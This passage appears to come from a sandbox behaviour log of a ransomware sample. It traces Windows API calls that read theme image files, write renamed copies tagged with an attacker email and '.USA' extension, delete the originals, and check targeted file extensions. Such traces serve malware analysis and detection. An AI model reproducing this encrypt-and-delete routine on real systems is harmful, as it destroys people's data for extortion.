lpOverlapped=0x0) returned 1 [0046.446] SetEndOfFile (hFile=0x178) returned 1 [0046.446] CloseHandle (hObject=0x178) returned 1 [0046.447] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.447] SetEndOfFile (hFile=0x174) returned 1 [0046.447] CloseHandle (hObject=0x174) returned 1 [0046.447] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.448] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\preview.gif")) returned 1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".doc") returned 4 [0046.448] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.448] lstrlenW (lpString=".docx") returned 5 [0046.448] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.448] lstrlenW (lpString=".pdf") returned 4 [0046.448] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".xls") returned 4 [0046.448] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".xlsx") returned 5 [0046.448] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.448] lstrlenW (lpString=".ppt") returned 4 [0046.448] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".zip") returned 4 [0046.448] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".rar") returned 4 [0046.448] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.448] lstrlenW (lpString=".bz2") returned 4 [0046.448] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.448] lstrlenW (lpString=".7z") returned 3 [0046.448] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.448] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.448] lstrlenW (lpString=".dbf") returned 4 [0046.449] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".1cd") returned 4 [0046.449] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".jpg") returned 4 [0046.449] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".doc") returned 4 [0046.449] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString=".docx") returned 5 [0046.449] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.449] lstrlenW (lpString=".pdf") returned 4 [0046.449] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".xls") returned 4 [0046.449] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".xlsx") returned 5 [0046.449] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.449] lstrlenW (lpString=".ppt") returned 4 [0046.449] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".zip") returned 4 [0046.449] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".rar") returned 4 [0046.449] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.449] lstrlenW (lpString=".bz2") returned 4 [0046.449] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString=".7z") returned 3 [0046.449] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".dbf") returned 4 [0046.449] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.449] lstrlenW (lpString=".1cd") returned 4 [0046.450] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\PREVIEW.GIF") returned 75 [0046.450] lstrlenW (lpString=".jpg") returned 4 [0046.450] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.450] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.450] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.450] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=18413) returned 1 [0046.450] CloseHandle (hObject=0x174) returned 1 [0046.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 0x20 [0046.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.450] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.450] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.451] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.451] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.451] GetLastError () returned 0x0 [0046.451] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x47ed, lpOverlapped=0x0) returned 1 [0046.729] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x47f0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x47f0, lpOverlapped=0x0) returned 1 [0046.730] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.730] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.730] SetEndOfFile (hFile=0x178) returned 1 [0046.730] CloseHandle (hObject=0x178) returned 1 [0046.731] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.731] SetEndOfFile (hFile=0x174) returned 1 [0046.731] CloseHandle (hObject=0x174) returned 1 [0046.731] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.732] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png")) returned 1 [0046.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.732] lstrlenW (lpString=".doc") returned 4 [0046.732] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.732] lstrlenW (lpString=".docx") returned 5 [0046.732] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.732] lstrlenW (lpString=".pdf") returned 4 [0046.732] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.732] lstrlenW (lpString=".xls") returned 4 [0046.732] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.732] lstrlenW (lpString=".xlsx") returned 5 [0046.732] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.732] lstrlenW (lpString=".ppt") returned 4 [0046.732] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.732] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.732] lstrlenW (lpString=".zip") returned 4 [0046.732] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.732] lstrlenW (lpString=".rar") returned 4 [0046.732] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.732] lstrlenW (lpString=".bz2") returned 4 [0046.732] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.732] lstrlenW (lpString=".7z") returned 3 [0046.732] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString=".dbf") returned 4 [0046.733] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString=".1cd") returned 4 [0046.733] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString=".jpg") returned 4 [0046.733] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString=".doc") returned 4 [0046.733] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.733] lstrlenW (lpString=".docx") returned 5 [0046.733] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.733] lstrlenW (lpString=".pdf") returned 4 [0046.733] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.733] lstrlenW (lpString=".xls") returned 4 [0046.733] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.733] lstrlenW (lpString=".xlsx") returned 5 [0046.733] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.733] lstrlenW (lpString=".ppt") returned 4 [0046.733] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString=".zip") returned 4 [0046.733] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.733] lstrlenW (lpString=".rar") returned 4 [0046.733] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.733] lstrlenW (lpString=".bz2") returned 4 [0046.733] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.733] lstrlenW (lpString=".7z") returned 3 [0046.733] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.733] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.733] lstrlenW (lpString=".dbf") returned 4 [0046.733] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.734] lstrlenW (lpString=".1cd") returned 4 [0046.734] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.734] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG") returned 76 [0046.734] lstrlenW (lpString=".jpg") returned 4 [0046.734] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.734] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.734] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.243] GetFileSizeEx (in: hFile=0x1ec, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=48115) returned 1 [0047.243] CloseHandle (hObject=0x1ec) returned 1 [0047.243] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 0x20 [0047.252] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.252] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0047.252] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0047.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0047.263] GetLastError () returned 0x0 [0047.265] ReadFile (in: hFile=0x204, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xbbf3, lpOverlapped=0x0) returned 1 [0047.280] WriteFile (in: hFile=0x1ec, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xbc00, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xbc00, lpOverlapped=0x0) returned 1 [0047.282] ReadFile (in: hFile=0x204, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0047.282] WriteFile (in: hFile=0x1ec, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.282] SetEndOfFile (hFile=0x1ec) returned 1 [0047.282] CloseHandle (hObject=0x1ec) returned 1 [0047.282] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0047.282] SetEndOfFile (hFile=0x204) returned 1 [0047.283] CloseHandle (hObject=0x204) returned 1 [0047.284] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0047.284] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\level\\thmbnail.png")) returned 1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.284] lstrlenW (lpString=".doc") returned 4 [0047.284] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.284] lstrlenW (lpString=".docx") returned 5 [0047.284] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.284] lstrlenW (lpString=".pdf") returned 4 [0047.284] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.284] lstrlenW (lpString=".xls") returned 4 [0047.284] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.284] lstrlenW (lpString=".xlsx") returned 5 [0047.284] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.284] lstrlenW (lpString=".ppt") returned 4 [0047.284] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.284] lstrlenW (lpString=".zip") returned 4 [0047.284] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.284] lstrlenW (lpString=".rar") returned 4 [0047.284] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.284] lstrlenW (lpString=".bz2") returned 4 [0047.284] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.284] lstrlenW (lpString=".7z") returned 3 [0047.285] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.285] lstrlenW (lpString=".dbf") returned 4 [0047.285] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.285] lstrlenW (lpString=".1cd") returned 4 [0047.285] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.285] lstrlenW (lpString=".jpg") returned 4 [0047.285] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.285] lstrlenW (lpString=".doc") returned 4 [0047.285] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.285] lstrlenW (lpString=".docx") returned 5 [0047.285] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.285] lstrlenW (lpString=".pdf") returned 4 [0047.285] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.285] lstrlenW (lpString=".xls") returned 4 [0047.285] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.285] lstrlenW (lpString=".xlsx") returned 5 [0047.285] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.285] lstrlenW (lpString=".ppt") returned 4 [0047.285] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.285] lstrlenW (lpString=".zip") returned 4 [0047.285] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.285] lstrlenW (lpString=".rar") returned 4 [0047.285] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.285] lstrlenW (lpString=".bz2") returned 4 [0047.285] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.285] lstrlenW (lpString=".7z") returned 3 [0047.285] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.286] lstrlenW (lpString=".dbf") returned 4 [0047.286] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.286] lstrlenW (lpString=".1cd") returned 4 [0047.286] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.286] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\THMBNAIL.PNG") returned 74 [0047.286] lstrlenW (lpString=".jpg") returned 4 [0047.286] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.286] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0047.286] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.286] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.429] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=15737) returned 1 [0047.429] CloseHandle (hObject=0x1f4) returned 1 [0047.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png")) returned 0x20 [0047.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.431] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0047.431] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0047.431] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\refined\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0047.432] GetLastError () returned 0x0 [0047.432] ReadFile (in: hFile=0x1f4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x3d79, lpOverlapped=0x0) returned 1 [0047.466] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x3d80, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x3d80, lpOverlapped=0x0) returned 1 [0047.467] ReadFile (in: hFile=0x1f4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0047.467] WriteFile (in: hFile=0x178, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, 